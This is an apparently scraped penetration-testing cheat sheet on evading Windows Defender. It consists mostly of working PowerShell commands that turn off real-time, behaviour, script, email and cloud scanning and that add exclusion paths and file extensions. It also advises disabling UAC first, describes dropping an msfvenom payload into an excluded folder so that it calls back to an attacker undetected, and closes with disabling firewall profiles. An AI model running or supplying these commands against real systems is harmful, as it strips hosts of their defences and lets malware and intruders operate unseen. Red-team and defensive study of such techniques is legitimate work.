# Check if Defender is enabledGet-MpComputerStatusGet-MpComputerStatus| Select AntivirusEnabled# Check if defensive modules are enabledGet-MpComputerStatus| Select RealTimeProtectionEnabled, IoavProtectionEnabled,AntispywareEnabled | FL# Check if tamper protection is enabledGet-MpComputerStatus| Select IsTamperProtected,RealTimeProtectionEnabled | FL
Alternative Antivirus products
In some cases if it appears Defender is not enabled an alternative Antivirus solution may be in effect.
Decoding the value of ProductState to hex can help identify which Antivirus is enabled
'0x{0:x}'-f<ProductState>'0x{0:x}'-f393472
From the values below anything that has a 10 starting from the fourth numerical position indicates On and anything else indicates Off. As below we can see BitDefender is enabled and Windows Defender is disabled.
Turning off features
Note: Disabling UAC is advisable before attempting to turn features off. In testing some changes prompted for user confirmation before allowing change.
Note: If Tamper protection is enabled you will not be able to turn off Defender by CMD or PowerShell. You can however, still create an exclusion.
# Disables realtime monitoringSet-MpPreference-DisableRealtimeMonitoring $true# Disables scanning for downloaded files or attachmentsSet-MpPreference-DisableIOAVProtection $true# Disable behaviour monitoringSet-MPPreference-DisableBehaviourMonitoring $true# Make exclusion for a certain folderAdd-MpPreference-ExclusionPath"C:\Windows\Temp"# Disables cloud detectionSet-MPPreference-DisableBlockAtFirstSeen $true# Disables scanning of .pst and other email formatsSet-MPPreference-DisableEmailScanning $true# Disables script scanning during malware scansSet-MPPReference-DisableScriptScanning $true# Exclude files by extensionSet-MpPreference-ExclusionExtension"ps1"# Turn off everything and set exclusion to "C:\Windows\Temp"Set-MpPreference-DisableRealtimeMonitoring $true;Set-MpPreference-DisableIOAVProtection $true;Set-MPPreference-DisableBehaviorMonitoring $true;Set-MPPreference-DisableBlockAtFirstSeen $true;Set-MPPreference-DisableEmailScanning $true;Set-MPPReference-DisableScriptScanning $true;Set-MpPreference-DisableIOAVProtection $true;Add-MpPreference-ExclusionPath"C:\Windows\Temp"
Bypassing with Path Exclusions
With reference to above we see its possible to use PowerShell to exclude Windows Defender from taking action on certain paths, using path exclusions.
Add-MpPreference-ExclusionPath "C:\Windows\Temp"
Running curl on a msfvenom payload where the output folder is outside of the defined exclusion path:
Running the same command again however, this time specifying the excluded path from Defender C:\temp we see Defender has not picked up the malware.
Over on the attackers machine we see the msfvenom payload has connected back. Under normal circumstances AV will have no issues discovering this msfvenom payload.
Firewall
Disable all Firewall profiles (Requires Admin privileges).